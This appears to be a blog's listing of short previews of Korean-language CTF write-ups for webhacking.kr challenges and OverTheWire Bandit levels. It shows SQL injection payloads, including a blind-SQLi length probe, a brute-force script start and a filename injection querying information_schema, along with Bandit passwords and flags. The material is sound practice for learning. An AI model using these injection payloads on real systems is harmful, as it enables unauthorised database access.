m0nd2y(321)
-
webhacking.kr - old40
초반에 문제 페이지를 들어가면 아래와 같은 화면이 있습니다. 기본적인 sqli입니다. no 부분에서 sqli가 터지는 것을 확인할 수 있습니다. 해당 부분에서 쿼리를 줘서 password의 길이를 파악할 수 있습니다. > webhacking.kr/challenge/web-29/?no=0%7C%7Cid%3D0x61646d696e%26%26length%28pw%29%3E0&id=guest&pw=guest Challenge 40 webhacking.kr 하나하나 해보면 pw의 길이는 총 10 이라는 것을 알 수 있고, 아래 코드를 돌림으로써 모든 password를 획득할 수 있습니다. import requests result = "" string = "abcdefghijklmnopqrstuvwxyz123456..
2021.04.17 -
Bandit - level10 → level11
level10 → level11 ssh bandit10@bandit.labs.overthewire.org -p 2220 pw : truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk cat data.txt base64 decode FLAG : IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR
2021.04.16 -
webhacking.kr - old29
처음 접속하게되면 위와 같이 파일업로드를 통한 sqli를 진행할 수 있습니다. sqli 를 통해 database를 검색해보면 filename="filename', 1234, '49.165.203.216', ((SELECT database()), 1234, '49.165.203.216')# clann29라는 db명을 확인할 수 있고, 이를 이용해서 테이블 이름을 찾을 수 있고, "files', 123, '49.165.203.216'), ((SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema='chall29'), 123, '49.165.203.216')#" flag_congratz라는 테이블을 이용해서 컬럼을 찾으..
2021.04.16 -
webhacking.kr - old45
처음 접속하면 위와 같이 50번 문제처럼 sqli를 유도하는 문제를 던져줍니다. 코드를 먼저 확인해보면 SQL INJECTION id : pw : view-source
2021.04.15 -
Bandit - level9 → level10
level9 → level10 ssh bandit9@bandit.labs.overthewire.org -p 2220 pw : UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR strings data.txt FLAG : truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk
2021.04.14 -
webhacking.kr - old50
처음에 문제 화면을 접속해보면 위와 같이 sqli 를 유도하는 문제를 확인할 수 있습니다. 소스코드를 확인해보면 SQL INJECTION id : pw :
2021.04.14